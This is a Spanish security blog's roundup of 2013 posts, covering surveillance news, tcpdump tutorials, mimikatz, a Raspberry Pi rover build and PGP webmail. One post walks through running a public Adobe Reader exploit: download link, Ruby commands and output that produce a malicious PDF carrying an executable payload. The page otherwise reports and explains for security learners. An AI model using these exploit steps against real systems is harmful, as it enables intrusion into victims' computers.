Lo más visto del 2013 en Hackplayers

Volvemos a despedir el año con las 50 entradas de Hackplayers más vistas, según Google Analytics.

Como siempre, daros las gracias por leernos y participar con vuestros comentarios, soluciones a los retos y colaboraciones. No dudéis en contactar con nosotros si estáis interesados en algún tema en particular o si queréis participar con vuestro artículo. Nos vemos en el 2014. ¡Feliz y próspero año nuevo!

  1. 25 servicios VPN gratuitos for fun and profit
  2. WiFite: crackear redes wifi para dummies
  3. hackplayers: Blogroll en español
  4. Haciendo trampas en TriviaDos
  5. Crackea redes wifi con tu Android (en modo monitor)
  6. Algunos google dorks para espiar cámaras web en Internet
  7. Cómo desbloquear el bootloader, rootear y liberar un Huawei Ascend sin morir en el intento
  8. Cómo comprometer el patrón de desbloqueo de Android
  9. androrat: un troyano RAT para Android
  10. Cuidado con la extensión de Chrome de Series.ly...
  11. Libro: Hacker Épico en pdf
  12. Cómo crear un certificado SSL auto-firmado
  13. Cómo usar Google como servidor proxy
  14. Cómo saltar los enlaces de publicidad como adf.ly o similares
  15. WhatsAppSniffer: captura fácilmente conversaciones de WhatsApp
  16. El "texto de la muerte" para los usuarios de Apple
  17. De cómo colarse en el metro de forma elegante... (NFC hack)
  18. Rompen el cifrado RSA escuchando el sonido de emite la CPU
  19. Taller de lock picking #2: Técnicas de apertura
  20. Vulnerabilidad en Skype permite obtener la IP de cualquier usuario

Latch: una aplicacion para dominarlas a todas

by me.. Me gustaría despedir el año con lo que a mí me ha parecido la mejor idea de este 2013, os presento a Latch...
 
A primeros de junio Telefónica lanzaba Eleven Paths, una filial de seguridad a la cabeza de la cual colocaba a Chema Alonso (el de la foto ;D).

El pasado 13 de diciembre Alonso presentaba en sociedad Latch, una propuesta con la que Telefónica quiere proteger la identidad digital de los usuarios.

Latch  se basa en la idea de que los diferentes servicios online a los que accede el usuario no tienen por qué estar “encendidos” de manera constante.

Poder “encender y apagar” esos servicios de la misma manera que se echa el pestillo a una puerta es, según Chema Alonso, una manera de garantizar la seguridad digital de los usuarios en una época “en la que se hackea todo”.

Del lado del usuario Latch es una aplicación que el usuario se instala en el móvil con un manejo sencillo y no necesita ningún tipo de conocimiento experto...

Cómo acceder a un terminal SSH desde el navegador web

Normalmente en las empresas los firewalls perimetrales sólo permiten el tráfico HTTP(s) hacia Internet. Hoy vamos a ver otra herramienta para poder evadir esta restricción y poder ejecutar un terminal SSH a través del navegador: Shell In A Box (o ShellInABox).

ShellInABox es un emulador de terminal web basado en ajax para cualquier navegador que soporte Javascript y CSS sin necesidad de disponer de ningún plugin adicional.
Existen otros emuladores para navegador mediante complementos como NaCl o FireSSH, si bien necesitarás acceso al exterior por el puerto 22/TCP.  Con ShellInABox accederás directamente al puerto 443/TCP de HTTPS.

Ahora bien, ¿por qué no cambiar el puerto del demonio SSH del 22/TCP al 443/TCP y dejarnos de tanta historia? Pues principalmente porque no tendrás necesidad de utilizar otro cliente como Putty y porque muchos firewalls con inspección de paquetes detectarían el intercambio de claves al menos que lo ofuscemos con ossh y Potty. 

Qué deberíamos saber sobre Tcpdump (parte II)

Para terminar esta semana seguiremos por donde lo dejamos en la primera parte de esta serie de artículos sobre Tcpdump. 
  
La captura de paquetes es una de las formas más poderosas y fundamentales para analizar las redesY de la mano viene el filtrado.

Hoy nos ocupa el filtrado de las cabeceras de los  datagramas. Si recordáis, ya vimos un pequeño ejemplo en la entrada anterior, concretamente la manera de hacer filtros para los paquetes por el estado de sus flags...

Filtrado avanzado de encabezado
 
Tal y como os comento, anteriormente vimos como filtrar las banderas en el protocolo tcp según su posición en el octeto correspondiente en la cabecera. 
Como no, hay varias maneras de hacer esto...

Si para filtrar los paquetes con el ACK activo era " tcp[13] & 16 == 16 " , en realidad hay una manera mas fácil de hacer esto y sería: tcpdump-i eth1 'tcp [tcpflags] == tcp-ACK'

De esta misma manera podemos filtrar los paquetes tomando como referencia cualquier parte del Header del paquete y podemos aplicar los siguientes operadores >,<, >= <=, = y !=

 tcpdump "udp[0:2] < 1024"

#30c3: Comienza la edición 30 del congreso anual del CCC

El Chaos Computer Club (CCC) nació en Berlín en 1981 y hoy en día es la mayor asociación de hackers de Europa. Todos los años, entre Navidad y Nochevieja, organizan el Chaos Communication Congress que este año llega a su trigésima edición: 30c3.

Entre el 27 y el 30 de diciembre se impartirán en Hamburgo 130 charlas y 360 presentaciones, habrá talleres y se presentarán interesantes proyectos de código abierto.
Uno de los temas principales de la conferencia será la seguridad del hard y el software. Un enfoque especial del programa será por supuesto para la información filtrada por Edward Snowden y los sistemas de vigilancia de las agencias de espionaje y sus lacayos de la política y la industria, así como contramedidas contra ellos.

Además, como nota curiosa, este año la conectividad a Internet del congreso se realizará mediante un enlace récord de 100 Gbit, que ha sido posible gracias a las donaciones de los ISP y proveedores de equipos de red. 


El 30c3 es un evento no comercial, con precios bajos para sus entradas, que sólo es posible gracias a la incansable labor de innumerables voluntarios del CCC.

Puedes seguir los vídeos de las charlas en directo por streaming en: https://events.ccc.de/congress/2013/wiki/Streams


Grabaciones disponibles: https://events.ccc.de/congress/2013/wiki/Static:Documentation#Recordings

Publican el API y dos exploits funcionales para Snapchat

Por si alguien no lo conoce... Snapchat es una aplicación de mensajería instantánea para iOS (iPhone) o Android que te permite enviar fotos y videos a uno o más amigos con una duración definida. Es decir, cuando las fotos o videos que has enviado alcanzan su duración límite (hasta 10 segundos) se borrarán (supuestamente) del teléfono de la persona que los recibió de manera automática.

Se calcula que actualmente hay más de 8 millones de usuarios activos y... bueno... Snapchat tiene la reputación de ser la aplicación que utilizan (sobretodo los más jóvenes) para compartir contenido sexual... uséase... sexting...

En agosto, los australianos de Gibson Security avisaron a Snapchat de varias vulnerabilidades pero la empresa se ​​mantuvo en silencio y no las solucionó. El día de navidad (toma regalo), cansados de su indiferencia, han decidido publicar el API no documentada y dos exploits totalmente funcionales:

- el primero de ellos permite con una sola petición (/ph/find_friends) saber si un número de teléfono está o no asociado a una cuenta de Snapchat. No hay que ser un lumbreras para saber que si se automatiza el proceso podemos obtener una base de datos de cuentas de Snapchat y se cree que, con una conexión de 1gb, se podría obtener una total en unas 20 horas. 


¡Feliz navidad!

perl -e '$n="\e[0;40;32m";for(1..10){print"\ec$n\n".$"x(15)."\e[1;35mY$n" .$"x15;for(1..8){print$/.$"x($a=16-$_);$c=int rand($d=2*$_);for(2..$d){$f=31+int rand(3);print($_-$c?"X":"\e[$f;1m*$n")}print$"x$a}print $/.$"x(31)."\e[0m\n".$"." Merry Xmas !!!".$/x2;select$q,$q,$q,0.5}'

Qué deberíamos saber sobre Tcpdump (parte I)

En una entrada anterior un lector anónimo comentaba: "Muy interesante sería una entrada para desvelar los misterios de tcpdump. En muchos tutoriales solo se araña la superficie de esta herramienta"... lo intentaremos.


La verdad es muy difícil decir algo de esta herramienta que no esté ya dicho, pero voy a intentar hacer un artículo en varias entregas con lo que creo que se debería saber sobre este magnifico sniffer

En esta serie de entradas (creo que serán unas 3) intentaremos abarcar todos los aspectos de esta herramienta, por favor si me dejo algo decirlo.
 
Para quien no sepa lo que es Tcpdump echaremos mano de Wikipedia... a modo de introducción: Tcpdump es un herramienta en línea de comandos cuya utilidad principal es analizar el tráfico que circula por la red.

Permite al usuario capturar y mostrar a tiempo real los paquetes transmitidos y recibidos en la red a la cual el ordenador está conectado.
Tcpdump funciona en la mayoría de los sistemas operativos UNIX: Linux, Solaris, BSD, Mac OS X, HP-UX y AIX entre otros. En esos sistemas, tcpdump hace uso de la biblioteca libpcap para capturar los paquetes que circulan por la red. 


Existe una adaptación de T
cpdump para los sistemas Windows que se llama WinDump y que hace uso de la biblioteca Winpcap.

Top 10 de las mejores herramientas de seguridad del 2013 de ToolsWatch

ToolsWatch es una de esas páginas imprescindibles para mantener al día tu arsenal de herramientas de seguridad. El siguiente Top 10 es una lista de las herramientas del 2013 más votadas y valoradas por sus usuarios y lectores:


1.- OWASP Zed Attack Proxy (ZAP): herramienta de fácil uso para encontrar vulnerabilidades en aplicaciones web. Está diseñada para ser utilizada tanto por desarrolladores y probadores funcionales (que son nuevos en tests de intrusión) como por personas con una amplia gama de experiencia en seguridad. Permite automatizar las pruebas y también facilita un número de herramientas para hacerlas manualmente.

2.- BeEF (The Browser Exploitation Framework): marco modular que utiliza técnicas pioneras que proveen la posibilidad de realizar pruebas de intrusión y poder experimentar varios vectores de ataques de carácter práctico. La herramienta se centra en el aprovechamiento de las vulnerabilidades del navegador web para abarcar la seguridad desde un punto objetivo.

3.- Burp Suite: herramienta que permite realizar test de intrusión en aplicaciones web, permitiendo combinar técnicas manuales y automáticas para enumerar, analizar, atacar y explotar aplicaciones Web. Puede funcionar como proxy entre nuestro navegador e Internet, pero además tiene otras muchas funcionalidades como un spider, un escáner o un repetidor por ejemplo.

4.- PeStudio: herramienta gratuita para realizar análisis estáticos de binarios ejecutables de Windows. Un fichero analizado con PeStudio no se ejecuta por lo que puede evaluarse sin riesgo aunque sea malware. Además tiene entorno gráfico y es portable.

Obtienen claves de cifrado RSA escuchando el sonido de emite la CPU

Recientemente han conseguido comprometer con éxito uno de los algoritmos de cifrado más seguros - RSA de 4096 bits - y, lo más sorprendente, es que lo han hecho simplemente escuchando con un micrófono el ruido que emite el procesador del ordenador al descifrar los datos (10 a 150 KHz).
 
Los investigadores extrajeron con éxito las claves de descifrado a una distancia de cuatro metros y en menos de una hora con un micrófono parabólico de alta calidad. Sin embargo, también se las arreglaron para atacar a un smartphone a 30 centímetros del portátil atacante y llevaron a cabo (con distinto éxito) pruebas contra diferentes ordenadores portátiles y de sobremesa.
 
Este criptoanálisis acústico, realizado por Daniel Genkin, Adi Shamir (co-inventor de RSA) y Eran Tromer, utiliza lo que se conoce como un ataque de canal lateral (no convencional e indirecto) sobre la implementación 1.x del criptosistema RSA de de GnuPG y, a muy grandes rasgos, lo que hacen es obtener las claves RSA interpretando la señal acústica que se genera realmente por el regulador de voltaje de la CPU al ejecutar las correspondientes instrucciones para el descifrado de datos.

Lista de las principales certificaciones de seguridad informática y hacking ético


¿Estás pensando en obtener una certificación profesional en seguridad y hacking ético? Hoy queríamos compartir con vosotros un reciente artículo de EFYTimes se hace un breve repaso a las principales certificaciones de la actualidad:

1. Certified Ethical Hacker por EC-Council

 
CEH ofrece un amplio programa de hacking ético y de formación de seguridad en redes para cumplir con los más altos estándares para profesionales. Cientos de pymes y autores han contribuido al contenido que se presenta en el material pedagógico del CEH. En cada pack se ofrecen las últimas herramientas y exploits descubiertos en la comunidad underground. Sus investigadores han invertido miles de horas analizando las últimas tendencias y descubriendo las técnicas secretas utilizadas.

Otras certificaciones de EC-Council:

Licensed Penetration Tester - LPT
EC-Council Certified Security Analyst - ECSA
EC-Council Network Security Administrator - ENSA
EC-Council Certified Incident Handler - ECIH
Computer Hacking Forensic Investigator - CHFI
Chief Information Security Officer - CCISO

2. Gerente Certificado de Seguridad de la Información (CISM) por ISACA


El CISM es el estándar aceptado globalmente para las personas que diseñan, construyen y gestionan los programas de seguridad de la información empresarial. CISM es la principal certificación para administradores de seguridad de la información. El último índice trimestral de valoración de Habilidades y Certificaciones IT (ITSCPI) de Foote Partners clasificó a CISM como la más codiciada y la que más se paga de las certificaciones de seguridad.

Otras certificaciones de ISACA:

Certified Information Systems Auditor (CISA)
Certified in the Governance of Enterprise IT (CGEIT)
Certified in Risk and Information Systems Control (CRISC)


Vulnerabilidad en Twitter permite enviar mensajes directos sin permiso de los usuarios

El modelo de permisos de las aplicaciones de Twitter es bastante sencillo:


Es decir, si creamos una aplicación que tenga permisos sólo de lectura y escritura no debería acceder a los mensajes directos ¿verdad?

Pues no, Egor Homakov descubrió un bug en Twitter que permite a las aplicaciones enviar mensajes directos sin tener permisos específicos y sin que ni siquiera el usuario que tiene autorizada la aplicación se de cuenta.

¿Desmontan el CESICAT?

Apodado "la Tía Catalana", el "NCI catalán", "el NSA de Cataluña"....

Nació sin hacer ruido y sin llamar la atención y ante la necesidad de velar por la seguridad de las telecomunicaciones de la Generalitat y de sus instalaciones.... algo así como lo que hace INTECO (grandes profesionales) por el estado español.

Hasta que el pasado 27 de Octubre  Anonymous hizo saltar la liebre, filtrando unos documentos —previamente robados por un extrabajador—.

La cosa tiene miga, estrecha colaboración con Mossos d'Esquadra, supuestos contactos con el mossad israelí, espionaje a ciudadanos sin antecedentes, seguimientos de hacktivistas en la red, listas negras... todo apunta a que se estaban tomando su trabajo de agencia de seguridad informática demasiado a pecho, abarcando competencias de los grupos de seguridad del estado sin ningún tipo de orden judicial...

Como a dicho el abogado Hibai Arbide, cuyo perfil ha sido seguido por Cesicat... “aunque no sea espionaje, la recopilación de datos con criterios ideológicos está prohibida”. También argumenta “Una de las hipótesis con las que trabaja CiU es que, una vez Catalunya se declare independiente, haya servicios secretos y cloacas del Estado",  Arbide recuerda, además, que en noviembre de 2011 Felip Puig dijo que los Mossos irían “más allá de la ley” en el combate a la disidencia."

NSA utiliza las cookies para espiar

La Agencia de Seguridad Nacional (NSA, por sus siglas en inglés) de Estados Unidos recurre a las «cookies» de Google para consultar la actividad previa del usuario y conocer sus gustos —como hacen los anunciantes de Internet—, con el fin último de identificar los objetivos a espiar. 
 
Según una investigación del diario estadounidense «The Washington Post», unas diapositivas de la NSA proporcionadas por el excontratista de la NSA Edward Snowden confirmarían que la agencia está utilizando estas técnicas de rastreo para identificar objetivos a «hackear» y reforzar la vigilancia. 
  
Durante años, los defensores de la privacidad en Internet han expresado su preocupación por el uso de las herramientas de seguimiento comerciales que se usan para identificar y dirigirse a los consumidores con determinados anuncios. La industria, por su parte, responde que supone un beneficio para los consumidores al proporcionarles anuncios de su interés
  
Según los citados documentos, la NSA y el GCHQ (la agencia de inteligencia del Reino Unido) han encontrado «un uso particular» para un mecanismo de seguimiento específico de Google, conocido como la «cookie» PREF, que no suele contener información personal, como el nombre de una persona o su dirección de correo electrónico, pero que incluye códigos numéricos que permiten identificar el navegador de un usuario. 
  
Además del seguimiento, esta «cookie» permitiría aislar las comunicaciones de una persona entre el mar de datos de Internet con el objetivo de enviar un software capaz de «hackear» la computadora de esa persona. Unos ataques específicos que, sin embargo, no estarían detallados en los documentos filtrados. 
  
Según ha resaltado el diario, la NSA utilizaría esta técnica para seguir a personas bajo sospecha o, incluso, para localizarles a través de la conexión a Internet de su terminal móvil, rastreando la ubicación de cada dispositivo. Los expertos consultados por este medio afirman que en las diapositivas no se especifica si existe un cooperación por parte de Google, aunque advierten de que si la NSA obtiene los datos de esa manera y las empresas conocen sus movimientos, están legalmente obligadas a denunciarlo.

Construye tu propio rover teledirigido con Raspberry Pi y WebIOPi

Para aprender cómo funciona la GPIO (General-purpose input/output) de Raspberry Pi he montado un pequeño rover motorizado que captura vídeo en tiempo real mediante una cámara USB y que puede ser controlado remotamente.

Quiero advertir que ya existen trabajos similares y productos prefabricados mejor acabados y seguramente con mayor rendimiento, pero si te interesara diseñar y hacer funcionar tu propio robot casero entonces te invito a que sigas leyendo :D

Eligiendo el hardware y conectando todo

La base es un viejo coche de control remoto por radiofrecuencia que compré hace años en un bazar chino. Sobre éste gira el proyecto: dos motores de corriente continua (DC) moviendo dos ejes para las ruedas de marcha adelante/atrás y dirección derecha/ izquierda:


Para mover los motores necesitamos un controlador H-Bridge o puente en H que no es más que un circuito electrónico que permite aplicar un voltaje a través de una carga en cualquier dirección, es decir, invertir la polaridad a nuestra elección para mover el motor en una dirección u otra. Además estos puentes en H permiten cortocircuitar para frenar en seco el motor o desconectar hasta su detención libre (free-run).

En este caso he elegido el módulo L298N, un controlador dual H-Bridge bastante popular y económico (4,35€) pero lo suficientemente potente como para impulsar motores de 5 a 35V y de hasta 2A. 


Usuarios inutilizan sus propias Xbox One al seguir las instrucciones de un bulo en Internet

Hace poco se publicaron en un foro de 4chan instrucciones falsas para que la nueva consola Xbox One pueda cargar los juegos de la antigua 360. 

En el mensaje (ya eliminado) se adjuntaba la imagen de la izquierda y básicamente indicaba cómo poner la Xbox One en modo desarrollo mediante una secuencia que fue descubierta de forma independiente a principios de diciembre y compartida a través de un vídeo de YouTube.

Cualquier usuario que haya seguido estos pasos sin disponer de un ID real de desarrollador no podrá volver a arrancar la consola en modo normal y, por lo tanto, habrá convertido su flamante nueva consola en un bonito y caro "pisapapeles".

"Para ser claro, no hay manera de hacer que su Xbox One sea compatible y realizar los pasos para intentarlo podría hacer que la consola sea inoperable", escribió en un tweet Larry Hryb , director de programación de la red Xbox Live de Microsoft.

No está claro cuántas personas han seguido el falso consejo, pero es un claro ejemplo de lo dañino que puede llegar a ser un bulo (hoax o prank) en Internet...

Fuentes:
Xbox One backwards-compatibility prank breaking consoles 
Warning over 4Chan Xbox One prank
Xbox One: Gamers DESTROY their own consoles in cruel hacking prank

Cuarto aniversario de Hackplayers

Hoy 9 de diciembre cumplimos cuatro años y no queríamos dejar pasar la ocasión para agradeceros el seguir soportándonos ;)

Este año hemos superado los 10.000 seguidores en Twitter y hemos conseguido un meritorio séptimo puesto en los premios Bitácoras 2013 (llegando incluso a alcanzar un tercer puesto en las votaciones parciales), pero sobretodo hemos vuelto a disfrutar con la (in)seguridad informática y el hacking a veces ético con cosas tan alucinantes que son hasta difíciles de enumerar. 

Sirvan de ejemplo un supuesto malware capaz de enviar datos a través de sonidos inaudibles, un ataque DDoS contra Spamhaus que llegó a los 300 Gps, una cadena de caracteres en árabe que hacía fallar a las aplicaciones de iOS 6 y Mac OS X 10.8, drones que secuestran a otros drones, televisores LG que "espían" las costumbres de sus dueños, robos de grandes cantidades de Bitcoins y, quizás lo más importante y sonado, el escándalo del espionaje masivo de la NSA y algunos gobiernos afines...

Para el próximo año sólo esperamos que sea igual o más divertido y que podamos seguir compartiéndolo con todos vosotros. Nuestra asignatura pendiente: conseguir algún autor más que escriba regularmente en nuestro blog, ¿te animas?

SkyJack: un drone de bajo coste capaz de "secuestrar" a otros drones

Seguro que habéis leído y os ha llamado la atención una noticia reciente en la que se decía que Amazon estaba pensando utilizar drones para repartir paquetes pequeños a sus clientes. La perspectiva de un enjambre pequeño de aviones no tripulados plantea sin embargo una nueva gama de problemas de seguridad...

Samy Kamkar, creador del famoso gusano que noqueó a MySpace en 2005, ha creado un drone de bajo coste que es capaz de encontrar y secuestrar de forma inalámbrica otros drones. La plataforma del proyecto bautizado como SkyJack se compone de:

- Parrot AR.Drone 2: 289,00€
- Raspberry Pi: 38,95 €
- Batería USB (DigiPower 1100mAh: 16,90€)
- Adaptador inalámbrico Alfa AWUS036H: 27,99€  
- Adaptador inalámbrico Edimax EW-7811Un: 14,25€ 
- Software aircrack-ng, node-ar-drone, node.js y el código fuente de SkyJack (perl/js)


Básicamente lo que hace es ejecutar aircrack-ng para poner su tarjeta de red en modo monitor, detecta las redes y clientes cercanos, reconecta los clientes al Parrot y utiliza Node.js con node-ar-drone para controlar los drones (ciertos tipos, eso sí).

Es decir, por unos 400€ cualquiera podría tener un cuadricóptero capaz de interceptar y secuestrar otros drones para por ejemplo llevarse sus envíos y/o convertirles en drones zombies.


Interesante ¿verdad? http://samy.pl/skyjack/

Desarrollan malware capaz de transmitir datos a través de sonidos inaudibles

Seguro que os acordáis del misterioso malware badBIOS porque según se decía era capaz de transmitirse a través del sonido. Lejos de ser una fantasía de Dragos Ruiu ahora parece demostrarse que, en teoría, si es posible...

Michael Hanspach y Michael Goetz, investigadores del Instituto Fraunhofer de Alemania para la Comunicación, tratamiento de la información y ergonomía, han publicado recientemente un documento sobre los canales de comunicación encubiertos que utilizan señales de audio para transmitir datos de un sistema informático a otro.

Según Ars Technica, los expertos han desarrollado un prototipo de malware que es capaz de transmitir pequeñas cantidades de información, tales como las pulsaciones de teclado, a través de señales de audio inaudibles.

La prueba de concepto realizada por los investigadores tiene un alcance de 19,7 metros a través del aire mediante el uso de altavoces y micrófonos conectados en los ordenadores. Si bien puede no parecer mucho, se podría diseñar una red de malla acústica encubierta para permitir la transmisión de datos a través de múltiples hosts de nodos infectados.

Guía de buenas prácticas para proteger el Directorio Activo

Nadie puede negar que en la mayoría de las redes empresariales se utiliza Directorio Activo para proporcionar control de acceso a los puestos de usuario, los servidores y a las aplicaciones. Sin duda, el Directorio Activo juega un papel crítico en el entorno de TI.
En este contexto y para ayudar a las empresas a proteger sus entornos de Directorio Activo, Microsoft IT publicó en junio un documento técnico que os aconsejamos descargar y tener a mano como referencia: "Buenas prácticas para proteger el Directorio Activo" (en inglés:  "Best Practices for Securing Active Directory").

Los principios fundamentales de este documento son cuatro estrategias interrelacionadas que Microsoft IT recomienda tener en cuenta en un entorno de Active Directory típico, entre ellos:

    - La identificación de las vulnerabilidades
    - La reducción de la superficie de ataque
    - La monitorización de los indicadores de compromiso
    - El desarrollo de un plan de seguridad a largo plazo

Los métodos que se discuten en el documento se basan en gran medida en la experiencia de la Organización de Microsoft de la Seguridad de la Información y Gestión de Riesgos (ISRM), la cual es responsable de la protección de los activos de TI de Microsoft , de otras divisiones de negocio de Microsoft y de asesorar a 500 clientes globales.

Descarga del documento: http://download.microsoft.com/download/D/1/8/D1866CDE-9824-40F4-836A-4C8C233693F1/Best%20Practices%20for%20Securing%20Active%20Directory.docx

Exploit para Adobe Acrobat Reader con evasión de sandbox y de ASLR/DEP

A mediados de febrero de este año y en varias campañas de malware se utilizó un 0-day para las últimas versiones de Adobe Reader por el cual un atacante podía provocar un desbordamiento de buffer y ejecutar código arbitrariamente mediante un PDF malicioso especialmente modificado.

Hoy, las dos vulnerabilidades ya tienen su CVE asignado (CVE-2013-0640 y CVE-2013-0641) y @w3bd3vil y @abh1sek han rescatado de un foro ruso y adaptado un exploit que es capaz de evadir ASLR/DEP y el sandbox de la aplicación.
Afecta a las versiones 11.0.1, 11.0.0, 10.1.5, 10.1.4, 10.1.3, 10.1.2, 10.1 y 9.5 de Adobe Acrobat Reader y funciona bajo Windows 7 (32 y 64bit) y XP.

Para probarlo nada más sencillo. Primero necesitamos instalar Ruby 1.9 (http://dl.bintray.com/oneclick/rubyinstaller/rubyinstaller-1.9.3-p484.exe?direct) y las gemas origami y metasm:

d:\Ruby193\bin\gem.bat install metasm
d:\Ruby193\bin\gem.bat install origami -v "=1.2.5"


Luego descargamos el exploit (http://www.exploit-db.com/sploits/29881.tar.gz) y lo descomprimimos, lo desempaquetamos y echamos un vistazo a sus parámetros y uso:

D:\Hacking\Exploits\29881>d:\Ruby193\bin\ruby.exe xfa_MAGIC.rb
Usage: xfa_MAGIC.rb [options]
    -i, --input [FILE]               Input PDF. If provided, exploit will be injected into it (optional)
    -p, --payload [FILE]             PE executable to embed in the payload
        --low-mem                    Use Heap spray suitable for low memory environment
    -o, --output [FILE]              File path to write output PDF
    -h, --help  
                     Show help

Después simplemente seleccionamos nuestro ejecutable PE para el payload (máximo 114688 bytes) y el nombre del fichero PDF:

D:\Hacking\Exploits\29881>d:\Ruby193\bin\ruby.exe xfa_MAGIC.rb -p prueba.exe -o poc.pdf
[+] Loading package
[+] Embedding user executable (size: 18944)
[+] Encoding payload (key: 249 kii: 251)
[+] Generating file: poc.pdf

 
Buen fin de semana y happy hacking!

Propagan la noticia falsa de que hackers comprometen los servidores de la FIFA y filtran el cuadro de grupos del Mundial

Hoy he recibido varios correos de amigos comentando una noticia en el Marca. En ella se hablaba de que un grupo de hackers logró comprometer los servidores de la FIFA y filtrar el cuadro de grupos del Mundial de fútbol de 2014, algo sorprendente teniendo en cuenta que hasta el próximo 6 de diciembre no es el sorteo oficial:


¡Genial! En seguida me puse a buscar más referencias, pero menos de cinco minutos bastaron para saber que la noticia provenía de El Deforma, un referente de periodismo satírico en México y, en definitiva, un sitio de noticias para hacer reír:


Obtención de contraseñas en claro mediante volcados de memoria (dmp) con WinDbg y la extensión de mimikatz

Como ya sabéis, con mimikatz podemos obtener los hashes/contraseñas accediendo directamente al proceso o a un minidump de LSASS. Sin embargo, los contenidos de la memoria de LSASS están también "disponibles" a través de otras fuentes:

- copias de memoria de máquinas virtuales (archivos .vmem, etc.)
- archivos de hibernación (archivos hiberfil.sys)
- archivos de volcado de memoria crashdump (.dmp)
...

Hasta ahora mimikatz no podía tratar directamente estas fuentes de datos porque es relativamente complejo (aunque posible) crear un traductor de direcciones virtuales a físicas para todos los modos de direccionamiento (especialmente con las características de Microsoft) y porque el administrador de memoria de Windows no puede garantizar el mapeo de memoria virtual-física durante un tiempo T.

Por eso "Gentil Kiwi" ha creado una extensión para la herramienta más adecuada para la lectura de volcados de memoria (el formato "crashdump") y la manipulación de los símbolos: WinDBG!.

Veamos un ejemplo del uso de esta extensión mediante el análisis y la extracción de un fichero .vmem de una máquina virtual Win7 de VMWare, es decir, el fichero que contiene un backup de la paginación de memoria y que se genera automáticamente al pausar y guardar el estado de una VM.

¿Tienes un televisor LG? Pues seguramente te estén monitorizando...

Al ver publicidad en su nueva televisión, el dueño de un LG Smart TV en Gran Bretaña decidió investigar y descubrió que LG avisaba de sus prácticas de recolección de datos a sus anunciantes potenciales:

"LG Smart Ad analiza los programas favoritos de sus usuarios, el comportamiento online, la búsqueda de palabras clave y otra información para ofrecer anuncios relevantes a las audiencias objetivo. Por ej., LG Smart Ad puede ofrecer trajes de buen corte a hombres o cosméticos y fragancias seductoras a mujeres.


Por otra parte, LG Smart Ad es capaz de ofrecer útiles y variados informes de rendimiento de publicidad que otros anuncios de radiodifusión en directo no pueden, para identificar con precisión la eficacia publicitaria real."
   
El investigador, aka DoctorBeet, realizó una serie de capturas de tráfico y pudo comprobar cómo se enviaba información acerca de los canales que se estaban visualizando en cada momento y los nombres de los ficheros que contenían sus dispositivos conectados por USB.

Listado de software open source que utiliza la PlayStation 4

GRUB 2.0: Imágen filtrada del development kit de la PS4.
Todos los jugones ya sabrán que la PlayStation 4 fue lanzada en Estados Unidos la semana pasada y que llegará a Europa y Latinoamérica el próximo 29 de noviembre mientras que Japón tendrá que esperar hasta el 22 de febrero de 2014. 

Se está hablando mucho de que el sistema operativo de la nueva máquina de Sony es un spin de FreeBSD 9 (Orbis OS), algo que si embargo no debería ser tan sorprendente teniendo en cuenta que su licencia es bastante más "permisiva" y que este sistema inspirado en Unix ya fue utilizado incluso en la PS3.

También se comenta que Sony ha co-desarrollado junto con AMD drivers para aprovechar al máximo las características gráficas del hardware, si bien utiliza también bastante software de código abierto que queremos destacar y listamos a continuación:


Ten cuidado si guardas las contraseñas de tus sesiones con WinSCP...

Afortunadamante poco a poco se está sustituyendo el uso de FTP por SCP o SFTP sobre SSH-1 y SSH-2 para la transferencia de ficheros en Internet. 

Quizás unos de los clientes más utilizados bajo Windows es WinSCP. Esta herramienta te permite almacenar sesiones y también guardar sus respectivas contraseñas, algo en principio no recomendable:


Por defecto, WinSCP realiza una serie de sencillas operaciones bit a bit usando el nombre de usuario concatenado con el nombre de máquina y almacena la contraseña cifrada en la cadena del registro "HKEY_Current_User\Software\Martin Prikryl\WinSCP 2\Sessions" o en un fichero INI localizado en el mismo path del ejecutable del programa:

 
[Sessions\usuario@ftp.pruebas.cz]
HostName=ftp.pruebas.cz
UserName=usuario
FSProtocol=2
Password=B22F7258DC45B2991A080D15191F150B1A6C6F2F3A282C7235393F35712F392C2A353F35332B123F22310839312C332E3D302D6E6B

Cómo utilizar cifrado PGP con GMail, Yahoo y otras cuentas de webmail mediante Mailvelope

Hace poco Snowden reveló que la NSA ha estado recolectando datos desde las redes internas de los datacenters de Yahoo y Google por lo que hoy en día quien utiliza sus servicios de correo electrónico no tiene garantizado en absoluto la privacidad

No obstante, aún es posible luchar contra estas interceptaciones utilizando cifrado asimétrico PGP y además hacerlo fácilmente mediante la extensión de navegador Mailvelope.

Mailvelope es de código abierto y ofrece cifrado punto a punto facilitando las características del estándar OpenPGP a través de la integración de una serie de elementos flotantes en el interfaz del servicio webmail correspondiente. Todavía no ofrece la posibilidad de firmar mensajes o utilizar key servers para la obtención de claves públicas pero, como veréis a continuación, seguro que su facilidad de uso os animará a empezar a utilizarlo.


Preparando el entorno

Para instalarlo, podremos elegir la extensión para Chrome o Firefox: https://github.com/toberndo/mailvelope/releases
.

A continuación en la barra de complementos del navegador haremos clic en el icono del programa y en el menú desplegable seleccionaremos 'Opciones':

Lo primero que necesitaremos es generar un par de claves (pública y privada). Para ello indicaremos nuestro nombre, email y el tamaño de clave (1024, 2048 o 4096 bits). De momento sólo se puede seleccionar RSA como algoritmo y no se puede fijar la caducidad. Durante el proceso de generación de las claves es posible que el navegador deje de responder durante unos minutos:

¿Podría haber un backdoor en un sistema operativo de código abierto?

Que la NSA propuso a Linus Torvalds introducir una puerta trasera en Linux era un rumor que el propio creador del kernel ya reconoció en septiembre durante la conferencia LinuxCon. Ahora sin embargo ya es un hecho confirmado porque así se reveló durante la audiencia sobre la vigilancia de masas en el Parlamento Europeo de esta semana.

Nils Torvalds, padre de Linus y miembro del Parlamento Europeo de Finlandia, comentaba (minuto 3:09:06 del vídeo): “Cuando a mi hijo mayor le hicieron la misma pregunta: "¿te ha hecho la NSA alguna propuesta sobre backdoors", dijo "No" , pero al mismo tiempo él asintió. Era una clase de libertad legal. Le había dado la respuesta correcta, [pero] todos entendieron que la NSA se había acercado a él".

La historia no nos dice todavía qué respondió Linus Torvalds a la NSA, pero supongo que les dijo que no sería capaz de inyectar puertas traseras, aunque quisiera, ya que el código fuente es abierto y todos los cambios son revisados por muchas personas independientes. Después de todo, esa es una de las ventajas del código fuente abierto y la razón por la que, en teoría, se podría confiar cuando se trata de seguridad.

Y digo en teoría porque en este mundo ya nadie se ríe y piensa que eres un paranoico si afirmas que, aun así, también podrían haber introducido un backdoor en Linux, aunque sea un sistema operativo de código abierto...

#Bitácoras13, muchas gracias a tod@s!

No queríamos despedir la semana sin daros las gracias a todos aquellos que habéis votado a cualquier blog dentro de la categoría al Mejor Blog de Seguridad Informática de la edición 2013 de Bitácoras que patrocina ESET. 

